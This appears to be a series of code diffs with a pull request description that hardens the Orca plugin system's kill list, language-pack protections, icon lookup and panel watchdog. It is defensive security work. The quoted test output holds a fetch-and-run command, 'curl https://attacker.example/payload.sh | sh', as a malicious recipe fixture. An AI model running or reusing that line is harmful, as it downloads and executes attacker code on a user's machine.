 import { isQualifiedPluginKey } from './plugin-manifest'
 
 export const PLUGIN_KILL_LIST_ENTRY_LIMIT = 4_096
+/** Publisher clocks and client clocks disagree by minutes, never by days. */
+export const PLUGIN_KILL_LIST_FUTURE_SKEW_MS = 24 * 60 * 60 * 1000
 
 const advisoryUrlSchema = z
   .string()
@@ -22,6 +24,15 @@ export const pluginKillListSchema = z
     plugins: z.array(pluginKillListEntrySchema).max(PLUGIN_KILL_LIST_ENTRY_LIMIT)
   })
   .superRefine((killList, context) => {
+    // A far-future generatedAt makes every genuine later list look "older" and
+    // disables revocation permanently, so bound it at the parse chokepoint.
+    if (Date.parse(killList.generatedAt) > Date.now() + PLUGIN_KILL_LIST_FUTURE_SKEW_MS) {
+      context.addIssue({
+        code: z.ZodIssueCode.custom,
+        path: ['generatedAt'],
+        message: 'generatedAt is too far in the future'
+      })
+    }
     const seen = new Set<string>()
     for (const [index, plugin] of killList.plugins.entries()) {
       if (seen.has(plugin.pluginKey)) {

--- a/src/shared/plugins/plugin-kill-list.ts
+++ b/src/shared/plugins/plugin-kill-list.ts
@@ -24,15 +24,6 @@ export const pluginKillListSchema = z
     plugins: z.array(pluginKillListEntrySchema).max(PLUGIN_KILL_LIST_ENTRY_LIMIT)
   })
   .superRefine((killList, context) => {
-    // A far-future generatedAt makes every genuine later list look "older" and
-    // disables revocation permanently, so bound it at the parse chokepoint.
-    if (Date.parse(killList.generatedAt) > Date.now() + PLUGIN_KILL_LIST_FUTURE_SKEW_MS) {
-      context.addIssue({
-        code: z.ZodIssueCode.custom,
-        path: ['generatedAt'],
-        message: 'generatedAt is too far in the future'
-      })
-    }
     const seen = new Set<string>()
     for (const [index, plugin] of killList.plugins.entries()) {
       if (seen.has(plugin.pluginKey)) {
@@ -48,6 +39,17 @@ export const pluginKillListSchema = z
 
 export type PluginKillList = z.infer<typeof pluginKillListSchema>
 export type PluginKillListEntry = z.infer<typeof pluginKillListEntrySchema>
+
+/** A far-future generatedAt makes every genuine later list look "older" and
+ *  disables revocation permanently. Checked only on freshly fetched snapshots:
+ *  a cached list was already accepted once, and re-judging it against the
+ *  device clock would drop live revocations whenever that clock runs slow. */
+export function isPluginKillListTooFarInFuture(
+  killList: PluginKillList,
+  now = Date.now()
+): boolean {
+  return Date.parse(killList.generatedAt) > now + PLUGIN_KILL_LIST_FUTURE_SKEW_MS
+}
 
 export function killedPluginKeys(killList: PluginKillList): ReadonlySet<string> {
   return new Set(killList.plugins.map((plugin) => plugin.pluginKey))

--- a/src/shared/plugins/plugin-language-pack-artifact.test.ts
+++ b/src/shared/plugins/plugin-language-pack-artifact.test.ts
@@ -35,6 +35,9 @@ describe('plugin language-pack artifacts', () => {
 
   it.each([
     'PluginConsentDialog',
+    // The provenance badge and install-error copy carry the trust decision.
+    'PluginConsentProvenance',
+    'pluginError',
     'PluginKeybindingConsentPreview',
     'PluginMarketplaceListingRow',
     'PluginMarketplacePreviewDialog',
@@ -52,6 +55,33 @@ describe('plugin language-pack artifacts', () => {
         })
       )
     ).toMatchObject({ ok: false, error: expect.stringContaining('protected security copy') })
+  })
+
+  it('forges no trust badge: the community→Official swap is refused', () => {
+    expect(
+      parsePluginLanguagePackArtifact(
+        JSON.stringify({
+          auto: {
+            components: {
+              settings: { PluginConsentProvenance: { community: 'Official' } }
+            }
+          }
+        })
+      )
+    ).toMatchObject({
+      ok: false,
+      error: expect.stringContaining('auto.components.settings.PluginConsentProvenance')
+    })
+  })
+
+  it('still lets language packs translate non-plugin settings copy', () => {
+    expect(
+      parsePluginLanguagePackArtifact(
+        JSON.stringify({
+          auto: { components: { settings: { AppearanceSection: { title: 'Apariencia' } } } }
+        })
+      ).ok
+    ).toBe(true)
   })
 
   it.each([

--- a/src/shared/plugins/plugin-language-pack-artifact.ts
+++ b/src/shared/plugins/plugin-language-pack-artifact.ts
@@ -2,20 +2,11 @@ export const PLUGIN_LANGUAGE_CATALOG_MAX_ENTRIES = 20_000
 export const PLUGIN_LANGUAGE_CATALOG_MAX_DEPTH = 16
 
 const DANGEROUS_CATALOG_KEYS = new Set(['__proto__', 'prototype', 'constructor'])
-const PROTECTED_TRANSLATION_PREFIXES = [
-  'auto.components.settings.PluginConsentDialog',
-  'auto.components.settings.PluginInstallDialog',
-  'auto.components.settings.PluginKeybindingConsentPreview',
-  'auto.components.settings.PluginMarketplaceBrowser',
-  'auto.components.settings.PluginMarketplaceListingRow',
-  'auto.components.settings.PluginMarketplacePreviewDialog',
-  'auto.components.settings.PluginMarketplaceSourceDialog',
-  'auto.components.settings.PluginRemoveDialog',
-  'auto.components.settings.PluginRollbackDialog',
-  'auto.components.settings.PluginSettingsRow',
-  'auto.components.settings.PluginVmRecipeConsentPreview',
-  'auto.components.settings.PluginsSettingsSection'
-]
+// Why: every plugin-facing security surface lives under this namespace, so
+// protecting the whole subtree keeps a new dialog from silently becoming
+// plugin-writable the way PluginConsentProvenance did when it was extracted.
+const PROTECTED_TRANSLATION_ROOT = 'auto.components.settings.'
+const PROTECTED_TRANSLATION_MODULE = /^plugin/i
 
 export type PluginLanguagePackRegistration = {
   id: `plugin:${string}`
@@ -51,9 +42,10 @@ function isCatalogObject(value: unknown): value is Record<string, unknown> {
 }
 
 function protectedTranslation(path: string): boolean {
-  return PROTECTED_TRANSLATION_PREFIXES.some(
-    (prefix) => path === prefix || path.startsWith(`${prefix}.`)
-  )
+  if (!path.startsWith(PROTECTED_TRANSLATION_ROOT)) {
+    return false
+  }
+  return PROTECTED_TRANSLATION_MODULE.test(path.slice(PROTECTED_TRANSLATION_ROOT.length))
 }
 
 function hasUnsafeCatalogKeyCharacter(key: string): boolean {

--- a/src/shared/plugins/plugin-panel-bridge.ts
+++ b/src/shared/plugins/plugin-panel-bridge.ts
@@ -22,6 +22,11 @@ export const PLUGIN_PANEL_FRAME_NAME_PREFIX = 'orca-plugin-panel:'
 export const PANEL_MESSAGE_MAX_BYTES = 64 * 1024
 export const PANEL_MESSAGE_RATE_LIMIT = { maxMessages: 30, perMs: 10_000 }
 
+/** Liveness frames get a reserved budget sized for the ping cadence: a panel
+ *  saturating its action budget must still be able to prove it is alive. */
+export const PANEL_CONTROL_MESSAGE_MAX_BYTES = 1024
+export const PANEL_CONTROL_RATE_LIMIT = { maxMessages: 4, perMs: 10_000 }
+
 /** Watchdog cadence: a panel that misses a pong deadline is demoted to an
  *  errored badge. Busy-loop detection is valid only while the runtime frame-
  *  process gate confirms the sandbox stays outside the host renderer. */
@@ -124,6 +129,16 @@ export function looksLikePanelActionRequest(data: unknown): boolean {
     typeof data === 'object' &&
     data !== null &&
     (data as { type?: unknown }).type === PANEL_ACTION_REQUEST_TYPE
+  )
+}
+
+/** Cheap routing check (no schema work) for liveness frames, so the reserved
+ *  control budget — not the data budget — pays for pong-shaped traffic. */
+export function looksLikePanelControlFrame(data: unknown): boolean {
+  return (
+    typeof data === 'object' &&
+    data !== null &&
+    (data as { type?: unknown }).type === PANEL_PONG_TYPE
   )
 }
 

--- a/src/shared/plugins/plugin-panel-bridge.ts
+++ b/src/shared/plugins/plugin-panel-bridge.ts
@@ -22,10 +22,12 @@ export const PLUGIN_PANEL_FRAME_NAME_PREFIX = 'orca-plugin-panel:'
 export const PANEL_MESSAGE_MAX_BYTES = 64 * 1024
 export const PANEL_MESSAGE_RATE_LIMIT = { maxMessages: 30, perMs: 10_000 }
 
-/** Liveness frames get a reserved budget sized for the ping cadence: a panel
- *  saturating its action budget must still be able to prove it is alive. */
+/** Size cap for the reserved liveness lane. Deliberately size-only: any
+ *  per-window count on this lane can be spent by the panel's own pongs and
+ *  would drop the next genuine reply, which is the starvation this reserved
+ *  lane exists to prevent. Aggregate cost stays bounded because pongs are also
+ *  charged to the data budget and cost O(1) plus a walk capped here. */
 export const PANEL_CONTROL_MESSAGE_MAX_BYTES = 1024
-export const PANEL_CONTROL_RATE_LIMIT = { maxMessages: 4, perMs: 10_000 }
 
 /** Watchdog cadence: a panel that misses a pong deadline is demoted to an
  *  errored badge. Busy-loop detection is valid only while the runtime frame-
@@ -132,18 +134,19 @@ export function looksLikePanelActionRequest(data: unknown): boolean {
   )
 }
 
-/** Cheap routing check (no schema work) for liveness frames, so the reserved
- *  control budget — not the data budget — pays for pong-shaped traffic. */
-export function looksLikePanelControlFrame(data: unknown): boolean {
-  return (
-    typeof data === 'object' &&
-    data !== null &&
-    (data as { type?: unknown }).type === PANEL_PONG_TYPE
-  )
-}
-
-export function looksLikePanelPong(data: unknown): boolean {
-  return panelPongSchema.safeParse(data).success
+/** Reads a valid pong's pingId, or null. Hand-rolled rather than
+ *  `panelPongSchema.safeParse` because a rejected parse allocates an issue
+ *  list, which is ~90x the accepted-path cost — free CPU for a panel spamming
+ *  near-miss pongs. The schema stays the contract; this mirrors it exactly. */
+export function readPanelPongId(data: unknown): number | null {
+  if (typeof data !== 'object' || data === null) {
+    return null
+  }
+  const frame = data as { type?: unknown; pingId?: unknown }
+  if (frame.type !== PANEL_PONG_TYPE || typeof frame.pingId !== 'number') {
+    return null
+  }
+  return Number.isInteger(frame.pingId) && frame.pingId >= 0 ? frame.pingId : null
 }
 
 /** Validates action params against the host API spec (shared with workers). */

--- a/src/shared/plugins/plugin-panel-bridge.ts
+++ b/src/shared/plugins/plugin-panel-bridge.ts
@@ -146,7 +146,9 @@ export function readPanelPongId(data: unknown): number | null {
   if (frame.type !== PANEL_PONG_TYPE || typeof frame.pingId !== 'number') {
     return null
   }
-  return Number.isInteger(frame.pingId) && frame.pingId >= 0 ? frame.pingId : null
+  // isSafeInteger, not isInteger: zod's .int() rejects 2**53 and above, and a
+  // wider reader would admit ids the watchdog can never have issued.
+  return Number.isSafeInteger(frame.pingId) && frame.pingId >= 0 ? frame.pingId : null
 }
 
 /** Validates action params against the host API spec (shared with workers). */

--- a/src/shared/plugins/plugin-panel-message-budget.ts
+++ b/src/shared/plugins/plugin-panel-message-budget.ts
@@ -1,4 +1,9 @@
-import { PANEL_MESSAGE_MAX_BYTES, PANEL_MESSAGE_RATE_LIMIT } from './plugin-panel-bridge'
+import {
+  PANEL_CONTROL_MESSAGE_MAX_BYTES,
+  PANEL_CONTROL_RATE_LIMIT,
+  PANEL_MESSAGE_MAX_BYTES,
+  PANEL_MESSAGE_RATE_LIMIT
+} from './plugin-panel-bridge'
 
 /**
  * Per-plugin bridge budgets: message size cap and a sliding-window rate
@@ -38,6 +43,16 @@ export function createPanelMessageBudget(
       return null
     }
   }
+}
+
+/** Reserved liveness budget, separate from the data budget so a panel that
+ *  saturates its action allowance can still answer the watchdog. */
+export function createPanelControlMessageBudget(): PanelMessageBudget {
+  return createPanelMessageBudget({
+    maxBytes: PANEL_CONTROL_MESSAGE_MAX_BYTES,
+    maxMessages: PANEL_CONTROL_RATE_LIMIT.maxMessages,
+    perMs: PANEL_CONTROL_RATE_LIMIT.perMs
+  })
 }
 
 const textEncoder = new TextEncoder()

--- a/src/shared/plugins/plugin-panel-message-budget.ts
+++ b/src/shared/plugins/plugin-panel-message-budget.ts
@@ -1,6 +1,5 @@
 import {
   PANEL_CONTROL_MESSAGE_MAX_BYTES,
-  PANEL_CONTROL_RATE_LIMIT,
   PANEL_MESSAGE_MAX_BYTES,
   PANEL_MESSAGE_RATE_LIMIT
 } from './plugin-panel-bridge'
@@ -45,14 +44,18 @@ export function createPanelMessageBudget(
   }
 }
 
-/** Reserved liveness budget, separate from the data budget so a panel that
- *  saturates its action allowance can still answer the watchdog. */
+/**
+ * Reserved liveness lane, size-bounded only. A per-window count here would be
+ * spent by the panel's own pongs and would then drop the next genuine reply —
+ * the exact starvation this lane exists to prevent. Rate is still bounded
+ * because the caller also charges every pong to the data budget.
+ */
 export function createPanelControlMessageBudget(): PanelMessageBudget {
-  return createPanelMessageBudget({
+  return {
     maxBytes: PANEL_CONTROL_MESSAGE_MAX_BYTES,
-    maxMessages: PANEL_CONTROL_RATE_LIMIT.maxMessages,
-    perMs: PANEL_CONTROL_RATE_LIMIT.perMs
-  })
+    admit: (_now, messageBytes) =>
+      messageBytes > PANEL_CONTROL_MESSAGE_MAX_BYTES ? 'oversized' : null
+  }
 }
 
 const textEncoder = new TextEncoder()

--- a/src/shared/plugins/plugin-panel-pong-frame.test.ts
+++ b/src/shared/plugins/plugin-panel-pong-frame.test.ts
@@ -1,0 +1,41 @@
+import { describe, expect, it } from 'vitest'
+import { PANEL_PONG_TYPE, panelPongSchema, readPanelPongId } from './plugin-panel-bridge'
+
+/** `readPanelPongId` is hand-rolled to avoid zod's ~90x rejected-parse
+ *  allocation cost on the guest-controlled bridge path. It must therefore
+ *  accept exactly what `panelPongSchema` accepts, forever. */
+
+const CASES: unknown[] = [
+  { type: PANEL_PONG_TYPE, pingId: 0 },
+  { type: PANEL_PONG_TYPE, pingId: 7 },
+  { type: PANEL_PONG_TYPE, pingId: Number.MAX_SAFE_INTEGER },
+  { type: PANEL_PONG_TYPE, pingId: 7, extra: 'ignored' },
+  { type: PANEL_PONG_TYPE, pingId: -1 },
+  { type: PANEL_PONG_TYPE, pingId: 1.5 },
+  { type: PANEL_PONG_TYPE, pingId: Number.NaN },
+  { type: PANEL_PONG_TYPE, pingId: Number.POSITIVE_INFINITY },
+  { type: PANEL_PONG_TYPE, pingId: '7' },
+  { type: PANEL_PONG_TYPE, pingId: null },
+  { type: PANEL_PONG_TYPE },
+  { type: 'orca-panel-action', pingId: 7 },
+  { pingId: 7 },
+  'orca-panel-pong',
+  null,
+  undefined,
+  42,
+  []
+]
+
+describe('readPanelPongId', () => {
+  it.each(CASES.map((data, index) => [index, data]))(
+    'agrees with panelPongSchema on case %i',
+    (_index, data) => {
+      expect(readPanelPongId(data) !== null).toBe(panelPongSchema.safeParse(data).success)
+    }
+  )
+
+  it('returns the pingId the watchdog must correlate against', () => {
+    expect(readPanelPongId({ type: PANEL_PONG_TYPE, pingId: 7 })).toBe(7)
+    expect(readPanelPongId({ type: PANEL_PONG_TYPE, pingId: 0 })).toBe(0)
+  })
+})

--- a/src/shared/plugins/plugin-panel-pong-frame.test.ts
+++ b/src/shared/plugins/plugin-panel-pong-frame.test.ts
@@ -9,6 +9,11 @@ const CASES: unknown[] = [
   { type: PANEL_PONG_TYPE, pingId: 0 },
   { type: PANEL_PONG_TYPE, pingId: 7 },
   { type: PANEL_PONG_TYPE, pingId: Number.MAX_SAFE_INTEGER },
+  // Above the safe range zod's .int() refuses, though Number.isInteger accepts.
+  { type: PANEL_PONG_TYPE, pingId: Number.MAX_SAFE_INTEGER + 1 },
+  { type: PANEL_PONG_TYPE, pingId: 2 ** 60 },
+  { type: PANEL_PONG_TYPE, pingId: 1e100 },
+  { type: PANEL_PONG_TYPE, pingId: Number.MAX_VALUE },
   { type: PANEL_PONG_TYPE, pingId: 7, extra: 'ignored' },
   { type: PANEL_PONG_TYPE, pingId: -1 },
   { type: PANEL_PONG_TYPE, pingId: 1.5 },


### PR DESCRIPTION
## What

Five trust-boundary decisions in the plugin system (introduced in #8549) were enforced at individual call sites rather than at the boundary itself, so each had a path around it. `PluginContentPackRegistry.reconcile()` (`src/main/plugins/plugin-content-pack-registry.ts:38`) trusted a caller-supplied approval predicate that never consulted the kill list, so a killed plugin's VM recipes stayed live; `pluginKillListSchema` (`src/shared/plugins/plugin-kill-list.ts`) put no upper bound on `generatedAt`, so one far-future snapshot froze out every later revocation permanently; the protected-translation list in `plugin-language-pack-artifact.ts` was a 12-entry enumeration that a later refactor outgrew, letting a language pack rewrite the consent provenance badge; `resolvePluginPanelIcon()` used `??` against an object literal, so a manifest icon named `constructor` resolved to `Object` and crashed the right sidebar; and `plugin-panel-bridge-host.ts` charged watchdog pongs to the shared data budget, so a busy panel was declared dead while it was answering.

Each check now lives at the chokepoint: a constructor-level `isKilled` predicate re-read at the final admission gate, a subtree rule instead of an enumeration, `Object.hasOwn`, and a size-bounded reserved liveness lane that only schema-valid pongs may spend. The kill-list future bound is applied at the two fetch entry points rather than in the schema, deliberately — see "Proof of no regression".

## ELI5

Orca can install plugins, and it has several safety rails: a remote block-list for plugins later found to be malicious, a badge telling you whether a plugin is official or from a stranger, and a sandbox that keeps a misbehaving plugin from taking down the app. Each rail had a gap. A blocked plugin's saved setup commands kept running even after the block arrived. If the block-list ever got published with a broken date far in the future, blocking would quietly stop working forever after. A plugin that shipped translations could relabel itself "Official" in the very dialog that asks whether you trust it. A plugin could pick a specially-named icon and blank out the whole right-hand panel. And a busy plugin could get killed off for being unresponsive while it was in fact responding.

After this change, a blocked plugin's content is withdrawn immediately, a bad date is rejected instead of trusted, no plugin can rewrite the trust badge or any other plugin-safety wording, a strange icon name falls back to a plain plug symbol, and the health check has its own dedicated lane so a busy plugin can always answer it.

## Proof of fix

### Forged trust badge (finding 1.3) — visible

A real language-pack-only plugin (`community.forged-badge`, publisher `community`, loaded from a dev path) that maps `PluginConsentProvenance.community` to `"Official"`. Both shots are the same consent dialog for the same unrelated third-party plugin (`orca-samples.hostile-panel`, publisher `orca-samples`), in the same running app, same profile, same route — differing only by whether `src/shared/plugins/plugin-language-pack-artifact.ts` is at `main` or at this branch.

Before — a community plugin presents itself as **Official · orca-samples**:

![forged Official badge on parent](https://github.com/user-attachments/assets/6404ee12-fb2a-4b79-912c-ef1928fcb799)

After — the host's own copy wins, **Community · orca-samples**, and the language pack is refused at load:

![correct Community badge with the fix](https://github.com/user-attachments/assets/ed01e456-8383-4d05-a989-8bd9723e6eb2)

`window.api.plugins.list()` in the same two sessions, pasted verbatim:

```
PARENT: { "key": "community.forged-badge", "status": "idle",    "error": null }
FIX:    { "key": "community.forged-badge", "status": "errored",
          "error": "language pack \"es\" catalog cannot replace protected security copy
                    at auto.components.settings.PluginConsentProvenance" }
```

### Sidebar crash from a hostile icon name (finding 1.4) — visible

A dev plugin whose manifest declares `"icon": "constructor"`. Before, the whole right rail is replaced by its error boundary; after, Explorer renders and the plugin's panel icon appears in the activity bar.

![right sidebar collapsed to its error boundary](https://github.com/user-attachments/assets/d81beb27-b01e-4313-8e8c-fe00ba177a03)

![right sidebar rendering normally](https://github.com/user-attachments/assets/fbb74c38-3e42-4879-922d-23b2e3ce7df8)

### Kill-list revocation reaching content packs (finding 1.1) — not visually distinguishable

Settings correctly showed "Blocked by Orca's plugin safety list" both before and after; the defect was that the content stayed live behind that correct-looking UI. Proven at the service level with a real `PluginService` over a real on-disk plugin tree. Source hunk reverted to `main`, tests kept:

```
 FAIL  src/main/plugins/plugin-kill-list-content-revocation.test.ts > never publishes killed content after a restart discovers the plugin
AssertionError: expected [ { id: 'killed-recipe', …(2) } ] to deeply equal []

- Expected
+ Received

- []
+ [
+   {
+     "create": "curl https://attacker.example/payload.sh | sh",
+     "id": "killed-recipe",
+     "name": "Killed Recipe",
+   },
+ ]

 Test Files  1 failed (1)
      Tests  2 failed (2)
```

That `create` string is what reaches `spawn(..., { shell: true })`. With the fix, both the `reconcileActivationState()` path and the fresh-discovery path return `[]`.

### Far-future kill list (finding 1.2) — invisible by construction

Requires a poisoned server-side publication; nothing in the UI changes while revocation silently stops working. Source hunk reverted to `main`:

```
 FAIL  src/main/plugins/plugin-kill-list-service.test.ts > keeps accepting genuine lists after a far-future snapshot is published
AssertionError: promise resolved "{ version: 1, …(2) }" instead of rejecting

+ {
+   "generatedAt": "9999-12-31T23:59:59Z",
+   "plugins": [ { "pluginKey": "community.unsafe", "reason": "Malware advisory" } ],
+   "version": 1,
  }
```

### Watchdog starved by the data budget (finding 1.5) — timing race, not staged in the UI

Reproducing the visible symptom (panel demoted to an errored badge) needs a panel saturating 30 messages/10s while a 10s-interval ping lands in the same window; that race was not staged deterministically. Source hunk reverted to `main`:

```
 FAIL  src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.test.ts > keeps answering the watchdog while the data budget is saturated
AssertionError: expected "vi.fn()" to be called with arguments: [ 7 ]
Number of calls: 0
```

With the data budget hard-wired to always return `rate_limited`, the pong still reaches the watchdog.

**The first version of this fix reintroduced the same bug class — see the review-round section below.**

## Proof of no regression

### New regression tests

8 test files changed, 80 tests. For each finding, only the source hunk was reverted (tests left intact) and the suite re-run:

| Finding | Test file | Reverted-source result |
|---|---|---|
| 1.1 kill-list -> content packs | `plugin-kill-list-content-revocation.test.ts` | 2 failed |
| 1.1 kill during the awaited verify window | `plugin-content-pack-registry.test.ts` | 1 failed |
| 1.2 far-future `generatedAt` | `plugin-kill-list.test.ts` + `plugin-kill-list-service.test.ts` | 4 failed |
| 1.3 protected translations | `plugin-language-pack-artifact.test.ts` | 3 failed |
| 1.4 icon own-key lookup | `plugin-panel-activity-items.test.ts` | 3 failed |
| 1.5 reserved liveness lane | `plugin-panel-bridge-host.test.ts` | 3 failed |
| 1.5 pong reader matches the schema | `plugin-panel-pong-frame.test.ts` | 22-case parity; 4 failed |

All passing on HEAD:

```
 RUN  v4.1.5

 Test Files  8 passed (8)
      Tests  80 passed (80)
   Duration  407ms
```

Command: `npx vitest run --config config/vitest.config.ts <the 8 files>`. Note `pnpm test -- <file>` / bare `npx vitest` do not resolve the `@/` alias; `--config config/vitest.config.ts` is required.

### A regression this branch introduced and then fixed — please read

The first commit (43b14b51ec) put the future-skew bound inside `pluginKillListSchema.superRefine`, which evaluates `Date.now()` at parse time. That schema is **also** the on-disk cache read path (`plugin-kill-list-store.ts:28`), so the cached kill list was re-judged against the device clock at every launch, and `initialize()` catches a store read failure by setting `currentList = null`. On a device whose clock runs behind the last genuine publication — dead RTC, restored VM snapshot, fresh container — the entire cached kill list was discarded and the app booted with **zero** revocations: the same outcome as the original finding by an easier route.

Reproduced against 43b14b51ec (only the two source files checked out from that commit, current tests):

```
 FAIL  src/main/plugins/plugin-kill-list-service.test.ts > keeps cached revocations live when the device clock runs far behind
AssertionError: expected undefined to be '2026-07-28T22:23:16.059Z' // Object.is equality

- Expected: "2026-07-28T22:23:16.059Z"
+ Received: undefined
```

Fixed in 81b9674cf9: `isPluginKillListTooFarInFuture()` is applied at the two fetch chokepoints only (`performRefresh` before `store.write`, and `fetchPluginKillList`), leaving the cache read unbounded — a cached list was already accepted once, and re-judging it later can only lose revocations. The covering test `keeps cached revocations live when the device clock runs far behind` fails on both `main` and 43b14b51ec.

### Review round 2 — the reserved lane had the same bug it was fixing

Greptile (P2) caught that `PANEL_CONTROL_RATE_LIMIT = 4 / 10s` used the same window as `PANEL_WATCHDOG_PING_INTERVAL_MS`, so a panel's own pong traffic could exhaust the lane and drop the real reply. The original PR description called this an accepted trade-off. **That was wrong**, for a reason the description missed: the lane was entered on a cheap `type`-only check, so *near-miss* pongs (`pingId: -1`, `pingId: 'x'`, absent `pingId`) spent it without ever being valid pongs. Starvation was therefore reachable by a merely buggy panel, not only a hostile one, and re-creating the finding-1.5 bug class inside the finding-1.5 fix is not defensible.

Fixed in c8dbf7d312:

- **The lane is size-bounded only.** `PANEL_CONTROL_RATE_LIMIT` is deleted, not retuned — any per-window count can be spent by the panel's own pongs, so raising 4 to 8 would move the threshold without removing the window.
- **Only schema-valid pongs take the lane.** `looksLikePanelControlFrame` is replaced by `readPanelPongId()`, which returns the `pingId` or `null`; anything failing falls through to the data budget like any other malformed frame.
- **Rate stays bounded** because every pong is *also* charged to the data budget (30/10s); the handler simply does not let a refusal there silence liveness. The lane grants liveness, not an unmetered channel.

`readPanelPongId` is hand-rolled rather than `panelPongSchema.safeParse` because on this guest-controlled path a *rejected* zod parse allocates an issue list at ~90x the accepted-path cost (measured 5.05us vs 0.058us) — validating pong shape with zod would hand a spammer free CPU. `plugin-panel-pong-frame.test.ts` pins the reader to `panelPongSchema` across 22 cases so they cannot drift.

The pre-merge gate caught that the reader had **already** drifted from the schema at exactly the boundary the original 18 cases did not probe: zod v4's `.int()` requires a *safe* integer, but the reader used `Number.isInteger`, so `pingId: 1e100` took the reserved lane the schema would have refused (and could never correlate against a watchdog id starting at 0). Fixed in `7b473c327e` with `Number.isSafeInteger`, plus four above-`MAX_SAFE_INTEGER` parity cases. Reverting only the source change fails exactly those four.

CodeRabbit (Major, security) separately caught a TOCTOU on finding 1.1's own boundary: `approvedKeys` is snapshotted before the awaited verification phase, so a plugin killed during that wait still published. `approveAtomically` — the last gate before publication — now re-reads `isKilled`. Reverting only that hunk fails the new test with the attacker payload published:

```
AssertionError: expected [ { pluginKey: 'orca-samples.kill-race', …(1) } ] to deeply equal []
+ [ { "pluginKey": "orca-samples.kill-race",
+     "recipe": { "create": "curl https://attacker.example/payload.sh | sh",
+                 "id": "raced-recipe", "name": "Raced Recipe" } } ]
```

CodeRabbit (Minor) also caught that `resolvePluginPanelIcon('file-text') === resolvePluginPanelIcon('FileText')` passes when both fall back to `Plug`. The test now asserts the exact icon (`toBe(FileText)`), which is stronger than the suggested `not.toBe(Plug)`; stubbing the resolver to `return Plug` now fails it.

### Rebase onto current main

Rebased onto `25da91d653`. `a40183389b` (#11003) landed a new test, `refuses a valid request after malformed and pong traffic exhaust the budget`, which asserts a pong spends data budget — the exact behavior the first version of this branch removed, and the CI failure on this PR. That test encodes the right intent and is now satisfied by the design above (pongs are charged to the data budget; only the *refusal* is not allowed to silence liveness), so it is kept unmodified.

Checked for duplicate work: no upstream commit between `380034edf9` and `25da91d653` touches any of the five source files here (`git diff --stat 380034edf9 origin/main -- src/main/plugins src/shared/plugins` shows only `AiVaultSessionRow.tsx` and that one test file), so no hunk was dropped as already-fixed-upstream.

### Existing tests over the touched area

```
$ npx vitest run --config config/vitest.config.ts \
    src/main/plugins src/shared/plugins \
    src/renderer/src/components/right-sidebar \
    src/renderer/src/components/settings src/renderer/src/i18n

 Test Files  355 passed (355)
      Tests  2614 passed (2614)
   Duration  47.96s
```

`plugin-launch-content.test.ts`, which guards the bundled Portuguese launch pack against the widened 1.3 rule, passes.

### Typecheck and lint

```
$ pnpm run typecheck:node   # tsc --noEmit -p config/tsconfig.node.json  -> clean, exit 0
$ pnpm run typecheck:web    # tsc --noEmit -p config/tsconfig.tc.web.json -> clean, exit 0
$ pnpm run check:code-quality:changed
code quality: 0 new finding(s) across 17 changed file(s).
type-aware code quality: 0 new finding(s) across 17 changed file(s).
React Doctor: 0 new finding(s) across 17 changed file(s).
Changed-code quality gate passed since d3681f630670.
```

### Deliberate scope choices and open judgement calls

- **1.3 is broader than adding two prefixes.** The 12-entry enumeration is replaced by a subtree rule: `auto.components.settings.<module>` where the module segment matches `/^plugin/i`. This is what stops the next extracted dialog from silently regressing the way `PluginConsentProvenance` did. Blast radius measured: it protects 16 of 196 `auto.components.settings.*` modules across all five shipped locales (en/es/ja/ko/zh), and the only bundled language pack (`stablyai.orca-portuguese`) contains zero `auto.components.settings.*` keys. It also closes `PluginDevelopmentSection` and the `plugins` namespace, which the original list missed. **A reviewer should confirm no future non-security settings module is intended to be named `Plugin*`** — that is the one assumption this rule rests on.
- **The reserved liveness lane is size-bounded with no rate limit.** This is the deliberate choice, and the one most worth a second reader: any per-window count on that lane is spendable by the panel's own pongs and would drop the next genuine reply. Rate is bounded instead by charging every pong to the existing data budget (30/10s) while refusing to let a refusal there silence liveness. The residual cost of an unrated lane is one `readPanelPongId` plus one byte-walk capped at 1 KiB per pong-shaped frame — all of which the data budget already meters.
- **1.1 changes `PluginContentPackRegistry`'s constructor signature** (adds a required `isKilled` predicate). One production construction site exists (`plugin-service.ts:67`); two test constructions were updated to `() => false`.
- **Not changed:** the kill-list store's on-disk format and read path, the data budget's own limits (30 msgs / 10s / 64 KiB), the marketplace install path, and every non-`Plugin*` translation namespace. The fix cannot affect them — the content-pack change only narrows an existing approved-key set, the translation change only widens a refusal predicate, and the liveness change adds a second lane without relaxing the first.

### Verification gaps, stated plainly

- The forged-badge and sidebar-crash screenshots were captured by hand in the dev app over CDP. They are real captures of real app state, not mockups, but they are not produced by CI and will not be re-verified automatically.
- The 1.5 fix has no end-to-end reproduction of the visible symptom; the unit tests are the direct proof. The zod-vs-hand-rolled cost figures come from a local microbenchmark, not from production panel traffic.
- Findings 1.1 and 1.2 have no visual evidence at all, for the structural reasons given above.

Made with [Orca](https://github.com/stablyai/orca) 🐋